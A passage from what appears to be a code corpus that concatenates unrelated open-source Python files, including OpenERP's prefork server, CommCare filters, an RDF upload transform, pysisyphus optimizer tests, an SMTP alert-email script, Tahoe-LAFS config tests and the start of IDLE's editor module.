# suicide !!
os.kill(pid, signal.SIGTERM)
return
gevent.sleep(beat)
def start(self):
import gevent
from gevent.wsgi import WSGIServer
if os.name == 'posix':
signal.signal(signal.SIGQUIT, dumpstacks)
gevent.spawn(self.watch_parent)
self.httpd = WSGIServer((self.interface, self.port), self.app)
_logger.info('Evented Service (longpolling) running on %s:%s', self.interface, self.port)
self.httpd.serve_forever()
def stop(self):
import gevent
self.httpd.stop()
gevent.shutdown()
def run(self):
self.start()
self.stop()
class PreforkServer(CommonServer):
""" Multiprocessing inspired by (g)unicorn.
PreforkServer (aka Multicorn) currently uses accept(2) as dispatching
method between workers but we plan to replace it by a more intelligent
dispatcher to will parse the first HTTP request line.
"""
def __init__(self, app):
# config
self.address = (config['xmlrpc_interface'] or '0.0.0.0', config['xmlrpc_port'])
self.population = config['workers']
self.timeout = config['limit_time_real']
self.limit_request = config['limit_request']
# working vars
self.beat = 4
self.app = app
self.pid = os.getpid()
self.socket = None
self.workers_http = {}
self.workers_cron = {}
self.workers = {}
self.generation = 0
self.queue = []
self.long_polling_pid = None
def pipe_new(self):
pipe = os.pipe()
for fd in pipe:
# non_blocking
flags = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# close_on_exec
flags = fcntl.fcntl(fd, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
return pipe
def pipe_ping(self, pipe):
try:
os.write(pipe[1], '.')
except IOError, e:
if e.errno not in [errno.EAGAIN, errno.EINTR]:
raise
def signal_handler(self, sig, frame):
if len(self.queue) < 5 or sig == signal.SIGCHLD:
self.queue.append(sig)
self.pipe_ping(self.pipe)
else:
_logger.warn("Dropping signal: %s", sig)
def worker_spawn(self, klass, workers_registry):
self.generation += 1
worker = klass(self)
pid = os.fork()
if pid != 0:
worker.pid = pid
self.workers[pid] = worker
workers_registry[pid] = worker
return worker
else:
worker.run()
sys.exit(0)
def long_polling_spawn(self):
nargs = stripped_sys_argv('--pidfile','--workers')
cmd = nargs[0]
cmd = os.path.join(os.path.dirname(cmd), "openerp-gevent")
nargs[0] = cmd
popen = subprocess.Popen(nargs)
self.long_polling_pid = popen.pid
def worker_pop(self, pid):
if pid in self.workers:
_logger.debug("Worker (%s) unregistered",pid)
try:
self.workers_http.pop(pid,None)
self.workers_cron.pop(pid,None)
u = self.workers.pop(pid)
u.close()
except OSError:
return
def worker_kill(self, pid, sig):
try:
os.kill(pid, sig)
except OSError, e:
if e.errno == errno.ESRCH:
self.worker_pop(pid)
def process_signals(self):
while len(self.queue):
sig = self.queue.pop(0)
if sig in [signal.SIGINT,signal.SIGTERM]:
raise KeyboardInterrupt
elif sig == signal.SIGHUP:
# restart on kill -HUP
openerp.phoenix = True
raise KeyboardInterrupt
elif sig == signal.SIGQUIT:
# dump stacks on kill -3
self.dumpstacks()
elif sig == signal.SIGTTIN:
# increase number of workers
self.population += 1
elif sig == signal.SIGTTOU:
# decrease number of workers
self.population -= 1
def process_zombie(self):
# reap dead workers
while 1:
try:
wpid, status = os.waitpid(-1, os.WNOHANG)
if not wpid:
break
if (status >> 8) == 3:
msg = "Critial worker error (%s)"
_logger.critical(msg, wpid)
raise Exception(msg % wpid)
self.worker_pop(wpid)
except OSError, e:
if e.errno == errno.ECHILD:
break
raise
def process_timeout(self):
now = time.time()
for (pid, worker) in self.workers.items():
if (worker.watchdog_timeout is not None) and \
(now - worker.watchdog_time >= worker.watchdog_timeout):
_logger.error("Worker (%s) timeout", pid)
self.worker_kill(pid, signal.SIGKILL)
def process_spawn(self):
while len(self.workers_http) < self.population:
self.worker_spawn(WorkerHTTP, self.workers_http)
while len(self.workers_cron) < config['max_cron_threads']:
self.worker_spawn(WorkerCron, self.workers_cron)
if not self.long_polling_pid:
self.long_polling_spawn()
def sleep(self):
try:
# map of fd -> worker
fds = dict([(w.watchdog_pipe[0],w) for k,w in self.workers.items()])
fd_in = fds.keys() + [self.pipe[0]]
# check for ping or internal wakeups
ready = select.select(fd_in, [], [], self.beat)
# update worker watchdogs
for fd in ready[0]:
if fd in fds:
fds[fd].watchdog_time = time.time()
try:
# empty pipe
while os.read(fd, 1):
pass
except OSError, e:
if e.errno not in [errno.EAGAIN]:
raise
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def start(self):
# Empty the cursor pool, we dont want them to be shared among forked workers.
openerp.sql_db.close_all()
# wakeup pipe, python doesnt throw EINTR when a syscall is interrupted
# by a signal simulating a pseudo SA_RESTART. We write to a pipe in the
# signal handler to overcome this behaviour
self.pipe = self.pipe_new()
# set signal handlers
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGHUP, self.signal_handler)
signal.signal(signal.SIGCHLD, self.signal_handler)
signal.signal(signal.SIGTTIN, self.signal_handler)
signal.signal(signal.SIGTTOU, self.signal_handler)
signal.signal(signal.SIGQUIT, dumpstacks)
# listen to socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.setblocking(0)
self.socket.bind(self.address)
self.socket.listen(8*self.population)
def stop(self, graceful=True):
if self.long_polling_pid is not None:
self.worker_kill(self.long_polling_pid, signal.SIGKILL) # FIXME make longpolling process handle SIGTERM correctly
self.long_polling_pid = None
if graceful:
_logger.info("Stopping gracefully")
limit = time.time() + self.timeout
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
while self.workers and time.time() < limit:
self.process_zombie()
time.sleep(0.1)
else:
_logger.info("Stopping forcefully")
for pid in self.workers.keys():
self.worker_kill(pid, signal.SIGTERM)
self.socket.close()
def run(self):
self.start()
_logger.debug("Multiprocess starting")
while 1:
try:
#_logger.debug("Multiprocess beat (%s)",time.time())
self.process_signals()
self.process_zombie()
self.process_timeout()
self.process_spawn()
self.sleep()
except KeyboardInterrupt:
_logger.debug("Multiprocess clean stop")
self.stop()
break
except Exception,e:
_logger.exception(e)
self.stop(False)
sys.exit(-1)
class Worker(object):
""" Workers """
def __init__(self, multi):
self.multi = multi
self.watchdog_time = time.time()
self.watchdog_pipe = multi.pipe_new()
# Can be set to None if no watchdog is desired.
self.watchdog_timeout = multi.timeout
self.ppid = os.getpid()
self.pid = None
self.alive = True
# should we rename into lifetime ?
self.request_max = multi.limit_request
self.request_count = 0
def setproctitle(self, title=""):
setproctitle('openerp: %s %s %s' % (self.__class__.__name__, self.pid, title))
def close(self):
os.close(self.watchdog_pipe[0])
os.close(self.watchdog_pipe[1])
def signal_handler(self, sig, frame):
self.alive = False
def sleep(self):
try:
ret = select.select([self.multi.socket], [], [], self.multi.beat)
except select.error, e:
if e[0] not in [errno.EINTR]:
raise
def process_limit(self):
# If our parent changed sucide
if self.ppid != os.getppid():
_logger.info("Worker (%s) Parent changed", self.pid)
self.alive = False
# check for lifetime
if self.request_count >= self.request_max:
_logger.info("Worker (%d) max request (%s) reached.", self.pid, self.request_count)
self.alive = False
# Reset the worker if it consumes too much memory (e.g. caused by a memory leak).
rss, vms = memory_info(psutil.Process(os.getpid()))
if vms > config['limit_memory_soft']:
_logger.info('Worker (%d) virtual memory limit (%s) reached.', self.pid, vms)
self.alive = False # Commit suicide after the request.
# VMS and RLIMIT_AS are the same thing: virtual memory, a.k.a. address space
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
resource.setrlimit(resource.RLIMIT_AS, (config['limit_memory_hard'], hard))
# SIGXCPU (exceeded CPU time) signal handler will raise an exception.
r = resource.getrusage(resource.RUSAGE_SELF)
cpu_time = r.ru_utime + r.ru_stime
def time_expired(n, stack):
_logger.info('Worker (%d) CPU time limit (%s) reached.', config['limit_time_cpu'])
# We dont suicide in such case
raise Exception('CPU time limit exceeded.')
signal.signal(signal.SIGXCPU, time_expired)
soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
resource.setrlimit(resource.RLIMIT_CPU, (cpu_time + config['limit_time_cpu'], hard))
def process_work(self):
pass
def start(self):
self.pid = os.getpid()
self.setproctitle()
_logger.info("Worker %s (%s) alive", self.__class__.__name__, self.pid)
# Reseed the random number generator
random.seed()
# Prevent fd inherientence close_on_exec
flags = fcntl.fcntl(self.multi.socket, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(self.multi.socket, fcntl.F_SETFD, flags)
# reset blocking status
self.multi.socket.setblocking(0)
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
def stop(self):
pass
def run(self):
try:
self.start()
while self.alive:
self.process_limit()
self.multi.pipe_ping(self.watchdog_pipe)
self.sleep()
self.process_work()
_logger.info("Worker (%s) exiting. request_count: %s.", self.pid, self.request_count)
self.stop()
except Exception,e:
_logger.exception("Worker (%s) Exception occured, exiting..." % self.pid)
# should we use 3 to abort everything ?
sys.exit(1)
class WorkerHTTP(Worker):
""" HTTP Request workers """
def process_request(self, client, addr):
client.setblocking(1)
client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Prevent fd inherientence close_on_exec
flags = fcntl.fcntl(client, fcntl.F_GETFD) | fcntl.FD_CLOEXEC
fcntl.fcntl(client, fcntl.F_SETFD, flags)
# do request using BaseWSGIServerNoBind monkey patched with socket
self.server.socket = client
# tolerate broken pipe when the http client closes the socket before
# receiving the full reply
try:
self.server.process_request(client,addr)
except IOError, e:
if e.errno != errno.EPIPE:
raise
self.request_count += 1
def process_work(self):
try:
client, addr = self.multi.socket.accept()
self.process_request(client, addr)
except socket.error, e:
if e[0] not in (errno.EAGAIN, errno.ECONNABORTED):
raise
def start(self):
Worker.start(self)
self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
""" Cron workers """
def __init__(self, multi):
super(WorkerCron, self).__init__(multi)
# process_work() below process a single database per call.
# The variable db_index is keeping track of the next database to
# process.
self.db_index = 0
def sleep(self):
# Really sleep once all the databases have been processed.
if self.db_index == 0:
interval = SLEEP_INTERVAL + self.pid % 10 # chorus effect
time.sleep(interval)
def _db_list(self):
if config['db_name']:
db_names = config['db_name'].split(',')
else:
db_names = openerp.service.db.exp_list(True)
return db_names
def process_work(self):
rpc_request = logging.getLogger('openerp.netsvc.rpc.request')
rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
_logger.debug("WorkerCron (%s) polling for jobs", self.pid)
db_names = self._db_list()
if len(db_names):
self.db_index = (self.db_index + 1) % len(db_names)
db_name = db_names[self.db_index]
self.setproctitle(db_name)
if rpc_request_flag:
start_time = time.time()
start_rss, start_vms = memory_info(psutil.Process(os.getpid()))
import openerp.addons.base as base
base.ir.ir_cron.ir_cron._acquire_job(db_name)
openerp.modules.registry.RegistryManager.delete(db_name)
# dont keep cursors in multi database mode
if len(db_names) > 1:
openerp.sql_db.close_db(db_name)
if rpc_request_flag:
end_time = time.time()
end_rss, end_vms = memory_info(psutil.Process(os.getpid()))
logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % (db_name, end_time - start_time, start_vms / 1024, end_vms / 1024, (end_vms - start_vms)/1024)
_logger.debug("WorkerCron (%s) %s", self.pid, logline)
self.request_count += 1
if self.request_count >= self.request_max and self.request_max < len(db_names):
_logger.error("There are more dabatases to process than allowed "
"by the `limit_request` configuration variable: %s more.",
len(db_names) - self.request_max)
else:
self.db_index = 0
def start(self):
os.nice(10) # mommy always told me to be nice with others...
Worker.start(self)
self.multi.socket.close()
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------
server = None
def load_server_wide_modules():
for m in openerp.conf.server_wide_modules:
try:
openerp.modules.module.load_openerp_module(m)
except Exception:
msg = ''
if m == 'web':
msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
_logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
"""reexecute openerp-server process with (nearly) the same arguments"""
if openerp.tools.osutil.is_running_as_nt_service():
subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
exe = os.path.basename(sys.executable)
args = stripped_sys_argv()
args += ["-u", ','.join(updated_modules)]
if not args or args[0] != exe:
args.insert(0, exe)
os.execv(sys.executable, args)
def start():
""" Start the openerp http server and cron processor.
"""
global server
load_server_wide_modules()
if config['workers']:
server = PreforkServer(openerp.service.wsgi_server.application)
elif openerp.evented:
server = GeventServer(openerp.service.wsgi_server.application)
else:
server = ThreadedServer(openerp.service.wsgi_server.application)
if config['auto_reload']:
autoreload = AutoReload(server)
autoreload.run()
server.run()
# like the legend of the phoenix, all ends with beginnings
if getattr(openerp, 'phoenix', False):
modules = []
if config['auto_reload']:
modules = autoreload.modules.keys()
_reexec(modules)
sys.exit(0)
def restart():
""" Restart the server
"""
if os.name == 'nt':
# run in a thread to let the current thread return response to the caller.
threading.Thread(target=_reexec).start()
else:
os.kill(server.pid, signal.SIGHUP)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
trabacus-softapps/openerp-8.0-cc
|
openerp/service/server.py
|
Python
|
agpl-3.0
| 32,015 | 0.003155 |
from abc import ABCMeta, abstractmethod
import six
from django.db.models import Q
from dimagi.utils.chunked import chunked
class DomainFilter(six.with_metaclass(ABCMeta)):
@abstractmethod
def get_filters(self, domain_name):
"""Return a list of filters. Each filter will be applied to a queryset independently
of the others."""
raise NotImplementedError()
class SimpleFilter(DomainFilter):
def __init__(self, filter_kwarg):
self.filter_kwarg = filter_kwarg
def get_filters(self, domain_name):
return [Q(**{self.filter_kwarg: domain_name})]
class UsernameFilter(DomainFilter):
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 500 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_usernames_by_domain
usernames = get_all_usernames_by_domain(domain_name)
for chunk in chunked(usernames, 500):
filter = Q()
for username in chunk:
filter |= Q(username__iexact=username)
yield filter
class UserIDFilter(DomainFilter):
def __init__(self, user_id_field, include_web_users=True):
self.user_id_field = user_id_field
self.include_web_users = include_web_users
def get_filters(self, domain_name):
"""
:return: A generator of filters each filtering for at most 1000 users.
"""
from corehq.apps.users.dbaccessors.all_commcare_users import get_all_user_ids_by_domain
user_ids = get_all_user_ids_by_domain(domain_name, include_web_users=self.include_web_users)
for chunk in chunked(user_ids, 1000):
query_kwarg = '{}__in'.format(self.user_id_field)
yield Q(**{query_kwarg: chunk})
|
qedsoftware/commcare-hq
|
corehq/apps/dump_reload/sql/filters.py
|
Python
|
bsd-3-clause
| 1,812 | 0.002208 |
from __future__ import with_statement
import datetime
import logging
import pytz
import rdflib
from django.conf import settings
from humfrey.update.transform.base import Transform
from humfrey.update.uploader import Uploader
from humfrey.sparql.endpoint import Endpoint
from humfrey.utils.namespaces import NS
logger = logging.getLogger(__name__)
class Upload(Transform):
formats = {
'rdf': 'xml',
'n3': 'n3',
'ttl': 'n3',
'nt': 'nt',
}
created_query = """
SELECT ?date WHERE {
GRAPH %(graph)s {
%(graph)s dcterms:created ?date
}
}
"""
site_timezone = pytz.timezone(settings.TIME_ZONE)
def __init__(self, graph_name, method='PUT'):
self.graph_name = rdflib.URIRef(graph_name)
self.method = method
def execute(self, transform_manager, input):
transform_manager.start(self, [input])
logger.debug("Starting upload of %r", input)
extension = input.rsplit('.', 1)[-1]
try:
serializer = self.formats[extension]
except KeyError:
logger.exception("Unrecognized RDF extension: %r", extension)
raise
graph = rdflib.ConjunctiveGraph()
graph.parse(open(input, 'r'),
format=serializer,
publicID=self.graph_name)
logger.debug("Parsed graph")
datetime_now = self.site_timezone.localize(datetime.datetime.now().replace(microsecond=0))
modified = graph.value(self.graph_name, NS['dcterms'].modified,
default=rdflib.Literal(datetime_now))
created = graph.value(self.graph_name, NS['dcterms'].created)
if not created:
logger.debug("Getting created date from %r", transform_manager.store.query_endpoint)
endpoint = Endpoint(transform_manager.store.query_endpoint)
results = list(endpoint.query(self.created_query % {'graph': self.graph_name.n3()}))
if results:
created = results[0].date
else:
created = modified
graph += (
(self.graph_name, NS.rdf.type, NS.sd.Graph),
(self.graph_name, NS.dcterms.modified, modified),
(self.graph_name, NS.dcterms.created, created),
)
logger.debug("About to serialize")
output = transform_manager('rdf')
with open(output, 'w') as f:
graph.serialize(f)
logger.debug("Serialization done; about to upload")
uploader = Uploader()
uploader.upload(stores=(transform_manager.store,),
graph_name=self.graph_name,
filename=output,
method=self.method,
mimetype='application/rdf+xml')
logger.debug("Upload complete")
transform_manager.end([self.graph_name])
transform_manager.touched_graph(self.graph_name)
|
ox-it/humfrey
|
humfrey/update/transform/upload.py
|
Python
|
bsd-3-clause
| 2,982 | 0.001341 |
#!/usr/bin/env python3
import copy
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pysisyphus.plotters.AnimPlot import AnimPlot
from pysisyphus.calculators.MullerBrownPot import MullerBrownPot
#from pysisyphus.calculators.MullerBrownSympyPot import MullerBrownPot
from pysisyphus.cos.NEB import NEB
from pysisyphus.cos.SimpleZTS import SimpleZTS
from pysisyphus.optimizers.FIRE import FIRE
from pysisyphus.optimizers.BFGS import BFGS
from pysisyphus.optimizers.LBFGS import LBFGS
from pysisyphus.Geometry import Geometry
from pysisyphus.optimizers.SteepestDescent import SteepestDescent
KWARGS = {
"images": 4,
"max_cycles": 100,
"max_step": 0.02,
"convergence": {
"max_force_thresh": 0.1,
"rms_force_thresh": 0.02,
"max_step_thresh": 0.005,
"rms_step_thresh": 0.001,
},
"dump": False,
}
def get_geoms(keys=("B","C","TSA","A")):
coords_dict = {
"A": (-0.558, 1.442, 0), # Minimum A
"B": (0.6215, 0.02838, 0), # Minimum B
"C": (-0.05, 0.467, 0), # Minimum C
"AC": (-0.57, 0.8, 0), # Between A and C
"TSA": (-0.822, 0.624, 0) # Saddle point A
}
coords = [np.array(coords_dict[k]) for k in keys]
atoms = ("H")
geoms = [Geometry(atoms, c) for c in coords]
return geoms
def run_cos_opt(cos, Opt, images, **kwargs):
cos.interpolate(images)
opt = Opt(cos, **kwargs)
for img in cos.images:
img.set_calculator(MullerBrownPot())
opt.run()
return opt
def animate(opt):
xlim = (-1.75, 1.25)
ylim = (-0.5, 2.25)
levels=(-150, -15, 40)
ap = AnimPlot(MullerBrownPot(), opt, xlim=xlim, ylim=ylim, levels=levels)
ap.animate()
@pytest.mark.sd
def test_steepest_descent_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 4
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 56)
return opt
@pytest.mark.sd
def test_steepest_descent_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_cycles"] = 100
convergence = {
"max_force_thresh": 1.16,
"rms_force_thresh": 0.27,
"max_step_thresh": 0.021,
"rms_step_thresh": 0.005,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 62)
return opt
@pytest.mark.bfgs
def test_bfgs_straight_neb():
"""Something is really really wrong here."""
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"max_force_thresh": 5.0,
"rms_force_thresh": 1,
"max_step_thresh": 0.002,
"rms_step_thresh": 0.0006,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms(("A", "B")))
opt = run_cos_opt(neb, BFGS, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 45)
return opt
@pytest.mark.lbfgs
def test_lbfgs_neb():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 3
kwargs["fix_ends"] = True
k_min = 1000
k_max = k_min+10
neb = NEB(get_geoms(("A", "B")), k_min=k_min, k_max=k_max, fix_ends=True)
from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
# from pysisyphus.optimizers.LBFGS_mod import LBFGS
opt = run_cos_opt(neb, LBFGS, **kwargs)
# assert(opt.is_converged)
# assert(opt.cur_cycle == 45)
return opt
@pytest.mark.sd
def test_steepest_descent_neb_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"max_force_thresh": 0.6,
"rms_force_thresh": 0.13,
"max_step_thresh": 0.015,
"rms_step_thresh": 0.0033,
}
kwargs["convergence"] = convergence
neb = NEB(get_geoms())
opt = run_cos_opt(neb, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 41)
return opt
@pytest.mark.fire
def test_fire_neb():
kwargs = copy.copy(KWARGS)
kwargs["dt"] = 0.01
kwargs["dt_max"] = 0.1
neb = NEB(get_geoms())
opt = run_cos_opt(neb, FIRE, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 76)
return opt
def test_equal_szts():
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 17)
return opt
def test_equal_szts_straight():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
kwargs["max_step"] = 0.04
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(("A", "B")), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
return opt
def test_equal_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 7
convergence = {
"rms_force_thresh": 2.4,
}
kwargs["convergence"] = convergence
szts_equal = SimpleZTS(get_geoms(), param="equal")
opt = run_cos_opt(szts_equal, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 21)
return opt
def test_energy_szts():
kwargs = copy.copy(KWARGS)
convergence = {
"rms_force_thresh": 2.8,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 15)
return opt
def test_energy_szts_more_images():
kwargs = copy.copy(KWARGS)
kwargs["images"] = 10
convergence = {
"rms_force_thresh": 1.7,
}
kwargs["convergence"] = convergence
szts_energy = SimpleZTS(get_geoms(), param="energy")
opt = run_cos_opt(szts_energy, SteepestDescent, **kwargs)
assert(opt.is_converged)
assert(opt.cur_cycle == 22)
return opt
if __name__ == "__main__":
# Steepest Descent
opt = test_steepest_descent_neb()
#opt = test_steepest_descent_straight_neb()
#opt = test_steepest_descent_neb_more_images()
# opt = test_bfgs_straight_neb()
# opt = test_lbfgs_neb()
# FIRE
#opt = test_fire_neb()
# SimpleZTS
#opt = test_equal_szts()
#opt = test_equal_szts_straight()
#opt = test_equal_szts_more_images()
#opt = test_energy_szts()
#opt = test_energy_szts_more_images()
ap = animate(opt)
plt.show()
|
eljost/pysisyphus
|
tests_staging/test_mullerbrownpot.py
|
Python
|
gpl-3.0
| 6,681 | 0.002994 |
# coding=utf-8
# Copyright (C) 2014 Stefano Guglielmetti
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import smtplib, os, sys
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
#From address, to address, subject and message body
from_address = 'EMAIL_FROM_ADDRESS'
to_address = ['EMAIL_TO_ADDRESS']
email_subject = 'Alert!!! Zombies!!! Ahead!!!'
email_body = 'An intruder has been detected and needs to be eliminated!'
# Credentials (if needed)
username = 'YOUR_EMAIL_USERNAME'
password = 'YOUR_EMAIL_PASSWORD'
# The actual mail send
server = 'smtp.gmail.com:587'
def send_mail(send_from, send_to, subject, text, files=[], server="localhost"):
assert type(send_to)==list
assert type(files)==list
msg = MIMEMultipart()
msg['From'] = send_from
msg['To'] = COMMASPACE.join(send_to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach( MIMEText(text) )
for f in files:
part = MIMEBase('application', "octet-stream")
part.set_payload( open(f,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(f))
msg.attach(part)
smtp = smtplib.SMTP(server)
smtp.starttls()
smtp.login(username,password)
smtp.sendmail(send_from, send_to, msg.as_string())
smtp.close()
send_mail(from_address, to_address, email_subject, email_body, [sys.argv[1]], server) #the first command line argument will be used as the image file name
|
amicojeko/YouCantTouchThis
|
sendemail.py
|
Python
|
gpl-3.0
| 2,259 | 0.009296 |
import os.path
from twisted.trial import unittest
from allmydata.util import configutil
from allmydata.test.no_network import GridTestMixin
from ..scripts import create_node
from .. import client
class ConfigUtilTests(GridTestMixin, unittest.TestCase):
def test_config_utils(self):
self.basedir = "cli/ConfigUtilTests/test-config-utils"
self.set_up_grid(oneshare=True)
tahoe_cfg = os.path.join(self.get_clientdir(i=0), "tahoe.cfg")
# test that at least one option was read correctly
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "client-0")
# test that set_config can mutate an existing option
configutil.set_config(config, "node", "nickname", "Alice!")
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "nickname"), "Alice!")
# test that set_config can set a new option
descriptor = "Twas brillig, and the slithy toves Did gyre and gimble in the wabe"
configutil.set_config(config, "node", "descriptor", descriptor)
configutil.write_config(tahoe_cfg, config)
config = configutil.get_config(tahoe_cfg)
self.failUnlessEqual(config.get("node", "descriptor"), descriptor)
def test_config_validation_success(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n')
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config, dict(node=['valid']))
def test_config_validation_invalid_item(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\ninvalid = foo\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("section [node] contains unknown option 'invalid'", str(e))
def test_config_validation_invalid_section(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
f.write('[node]\nvalid = foo\n[invalid]\n')
config = configutil.get_config(fname)
e = self.assertRaises(
configutil.UnknownConfigError,
configutil.validate_config,
fname, config, dict(node=['valid']),
)
self.assertIn("contains unknown section [invalid]", str(e))
def test_create_client_config(self):
d = self.mktemp()
os.mkdir(d)
fname = os.path.join(d, 'tahoe.cfg')
with open(fname, 'w') as f:
opts = {"nickname": "nick",
"webport": "tcp:3456",
"hide-ip": False,
"listen": "none",
}
create_node.write_node_config(f, opts)
create_node.write_client_config(f, opts)
config = configutil.get_config(fname)
# should succeed, no exceptions
configutil.validate_config(fname, config,
client._valid_config_sections())
|
david415/tahoe-lafs
|
src/allmydata/test/test_configutil.py
|
Python
|
gpl-2.0
| 3,451 | 0.00058 |
import sys
import os
import re
import imp
from Tkinter import *
import tkSimpleDialog
import tkMessageBox
import webbrowser
from idlelib.MultiCall import MultiCallCreator
from idlelib import idlever
from idlelib import WindowList
from idlelib import SearchDialog
from idlelib import GrepDialog
from idlelib import ReplaceDialog
from idlelib import PyParse
from idlelib.configHandler import idleConf
from idlelib import aboutDialog, textView, configDialog
from idlelib import macosxSupport
# The default tab setting for a Text widget, in average-width characters.
TK_TABWIDTH_DEFAULT = 8
def _sphinx_version():
"Format sys.version_info to produce the Sphinx version string used to install the chm docs"
major, minor, micro, level, serial = sys.version_info
release = '%s%s' % (major, minor)
if micro:
release += '%s' % (micro,)
if level == 'candidate':
release += 'rc%s' % (serial,)
elif level != 'final':
release += '%s%s' % (level[0], serial)
return release
def _find_module(fullname, path=None):
"""Version of imp.find_module() that handles hierarchical module names"""
file = None
for tgt in fullname.split('.'):
if file is not None:
file.close() # close intermediate files
(file, filename, descr) = imp.find_module(tgt, path)
if descr[2] == imp.PY_SOURCE:
break # find but not load the source file
module = imp.load_module(tgt, file, filename, descr)
try:
path = module.__path__
except AttributeError:
raise ImportError, 'No source for module ' + module.__name__
if descr[2] != imp.PY_SOURCE:
# If all of the above fails and didn't raise an exception,fallback
# to a straight import which can find __init__.py in a package.
m = __import__(fullname)
try:
filename = m.__file__
except AttributeError:
pass
else:
file = None
base, ext = os.path.splitext(filename)
if ext == '.pyc':
ext = '.py'
filename = base + ext
descr = filename, None, imp.PY_SOURCE
return file, filename, descr
class HelpDialog(object):
def __init__(self):
self.parent = None # parent of help window
self.dlg = None # the help window iteself
def display(self, parent, near=None):
""" Display the help dialog.
parent - parent widget for the help window
near - a Toplevel widget (e.g. EditorWindow or PyShell)
to use as a reference for placing the help window
"""
if self.dlg is None:
self.show_dialog(parent)
if near:
self.nearwindow(near)
def show_dialog(self, parent):
self.parent = parent
fn=os.path.join(os.path.abspath(os.path.dirname(__file__)),'help.txt')
self.dlg = dlg = textView.view_file(parent,'Help',fn, modal=False)
dlg.bind('<Destroy>', self.destroy, '+')
def nearwindow(self, near):
# Place the help dialog near the window specified by parent.
